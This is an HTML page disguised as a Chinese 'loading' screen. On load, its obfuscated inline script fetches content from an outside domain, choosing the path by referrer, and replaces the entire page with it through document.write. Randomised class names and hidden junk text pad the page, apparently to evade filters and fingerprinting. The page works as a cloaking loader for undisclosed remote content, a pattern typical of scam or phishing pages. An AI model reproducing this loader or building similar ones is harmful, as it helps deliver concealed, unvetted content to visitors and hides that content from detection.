<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LVfnyKm5 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LVfnyKm5 .uMLRrNaq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LVfnyKm5 .content {
            line-height: 50px;
            text-align: center
        }

        .LVfnyKm5 .img {
            width: 100%
        }

        .LVfnyKm5 .iA42QZIUcQH {
            text-align: center
        }

        .LVfnyKm5 .iA42QZIUcQH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LVfnyKm5 .iA42QZIUcQH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LVfnyKm5 .iA42QZIUcQH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LVfnyKm5 .iA42QZIUcQH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LVfnyKm5 .iA42QZIUcQH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LVfnyKm5 .iA42QZIUcQH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LVfnyKm5 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function hzYHErofeNrU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gI0Ye = hzYHErofeNrU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gI0Ye +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gI0Ye +".html?a=share";
		}
		
        koQ0hV8=url+"#"+new Date().getTime();
        koQ0hV8 && function() {
            $.get(koQ0hV8, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>shu9bKa9NZ9Tan1HlqDsTab4Ij55kFOhcU4ELWw4PDmvHH9JA9WwXCqffuk64wvp8VeTWiHamaYl69WWQs</div>
<h1 style='display:none' >dJosKSbca3cfe3ADoB8Hese6eWMT2cpQKhuUM3Pv6htoFq</h1>
<b style='display:none' >jdzWC1y7CfXGHcYyTKBVwgnlqgUUrMllyATILdcvu1</b>
<li style='display:none' >j0OYUHy5VFTLDCoZPvK7CVwO2WPZ6yhKYqWMYaHp0NrzwIgDdKBi9HndYbfAnBGyc59d6hSww39EWU0HX6Jl</li>
<li style='display:none' >j0OYUHy5VFTLDCoZPvK7CVwO2WPZ6yhKYqWMYaHp0NrzwIgDdKBi9HndYbfAnBGyc59d6hSww39EWU0HX6Jl</li>
<img  src='' style='display:none'>
<span style='display:none'>ArEl834v5hFKxMrP1PDmTeb1n1r6OEKa6m</span><div class="LVfnyKm5">
    <div class="uMLRrNaq">
        <div class="iA42QZIUcQH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>CXPBsbUCkba25C3Q3DMk3U82IxDymgsO0xDPyHMzt8iGJHoG8X7X93SRCY9tiLK7pdYG6peYe4X3UGSsqOYfjtTrdhEFo</div>
<img  src='' style='display:none'>
<ul style='display:none' >lwnVuuyUAGh4Q8kRSQixsIf9dKtnDL1qtpkVJX4D</ul>
<h1 style='display:none' >sUisrZySonTAchO1KKur2ftdF5X1QgzFSPh3pBC2n1Vp1vpCHQpppyb</h1>
<b style='display:none' >LOdk341augAkwOZLDFbiLRvWg9q82GaXQcHA</b>
<p  style='display:none'>pP29e2KrXXeXOHAv0gKzBFD3EeON7eDe7cA5dQjziOTlfisRVSJw9ZuwnQ8peXSSMHOGnlm8h8ayd4tm</p></body>
</html>